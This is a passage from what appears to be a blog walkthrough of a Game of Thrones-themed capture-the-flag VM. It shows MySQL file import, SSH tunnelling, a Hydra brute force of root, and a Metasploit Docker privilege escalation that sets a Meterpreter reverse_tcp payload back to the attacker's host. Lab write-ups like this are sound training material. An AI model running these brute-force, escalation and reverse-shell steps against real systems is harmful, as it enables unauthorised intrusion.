Now we use the information above to find the tables available
in the database.
We find the name of the table, it is called iron_throne.
Now we find a morse code when we decode it we find it
converts to /etc/mysql/flag, when we try to access it gives that file not
found, earlier we find a hint that states we don’t have enough privileges so we
try to take a look at our privileges.
We find that we can import files into the database. So first we create a table named Flag.
Now we import the file into our table.
Now when we access it we find our 7th flag. We
also get username and password for ssh login.
Now we use this to login through ssh.
ssh
daenerystargaryen@192.168.1.133
Enumerating through the system we find two files called
digger.txt and checkpoint.txt, checkpoint.txt contains a hint to login through
ssh at ip 172.25.0.2 and use the file digger.txt to login through ssh.
We download digger.txt to our system through ssh.
We use local tunnelling to bind it to our port 2222.
Now we use hydra to login through ssh to using username as
root and use digger.txt file to brute force.
We
find that for the username root we have password “Dr4g0nGl4ss!”
We use this to login through ssh, we use localhost to
connect as we have done ssh local tunnel to connect to trough ssh.
Now we enumerating through the files we find our secret
flag. We also get a username and password to login through ssh.
We use metasploit to connect through ssh using this
username and password.
msf > use
auxiliary/scanner/ssh/ssh_login
msf auxiliary(scanner/ssh/ssh_login)
> set rhosts 192.168.1.133
msf
auxiliary(scanner/ssh/ssh_login) > set username branstark
msf
auxiliary(scanner/ssh/ssh_login) > set
password Th3_Thr33_Ey3d_Raven
msf
auxiliary(scanner/ssh/ssh_login) > run
After searching for some obvious possibilities to
escalate privileges such as executables with the
setuid bit set or exploits for the kernel, we noticed that
this server is docker based. So we use the docker privilege escalation in
metasploit.
msf > use
exploit/linux/local/docker_daemon_privilege_escalation
msf exploit(linux/local/docker_daemon_privilege_escalation)
> set lhost 192.168.1.116
msf exploit(linux/local/docker_daemon_privilege_escalation)
> set payload
linux/x86/meterpreter/reverse_tcp
msf exploit(linux/local/docker_daemon_privilege_escalation)
> set session 1
msf exploit(linux/local/docker_daemon_privilege_escalation)
> run
Now we get our escalated session, we now check and find that we are root.
Now we enumerate through the files and find password
protected zip file called final_battle and a file that tells us how to find the
password. It contains a pseudo code that tells us how to create the password
using secret flags we found.
Now we have obtained 2 secret flag, searching through the files
we find that music file contain a secret flag. In the home page we find 2 music
file we use exiftool and find that the mp3 file contains the secret flag.
exiftool game_of_thrones.mp3
Now we create a code using the pseudocode as reference in python.
We run the program and find the password.
We use zip to extract the file and use this password.
7z –e final_battle
We find that a file called flag.txt was extracted, we open
the file and find our final flag.
0 comments:
Post a Comment